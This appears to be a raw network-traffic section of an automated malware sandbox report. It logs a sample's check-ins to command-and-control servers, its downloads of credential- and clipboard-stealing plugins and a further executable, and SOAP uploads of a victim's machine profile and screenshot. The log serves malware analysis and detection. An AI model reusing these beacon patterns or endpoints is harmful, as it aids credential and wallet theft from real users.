                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1 Host: 193.233.132.167
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1 Host: 193.233.132.167
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000187001&unit=246122658369
                              Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1 Host: 193.233.132.167 If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMT If-None-Match: "6621b8e4-17e00"
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: b-stamps.gl.at.ply.gg:30946 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1 Host: 193.233.132.167
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: b-stamps.gl.at.ply.gg:30946 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000188001&unit=246122658369
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.167 Content-Length: 21 Cache-Control: no-cache Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                              Source: global traffic HTTP traffic detected: POST /enigma/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYyMQ== Host: 193.233.132.167 Content-Length: 4781 Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic | HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 193.233.132.56 | Content-Length: 4 | Cache-Control: no-cache | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95722 | Expect: 100-continue | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: b-stamps.gl.at.ply.gg:30946 | Content-Length: 95721 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95721Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 
41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95722Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 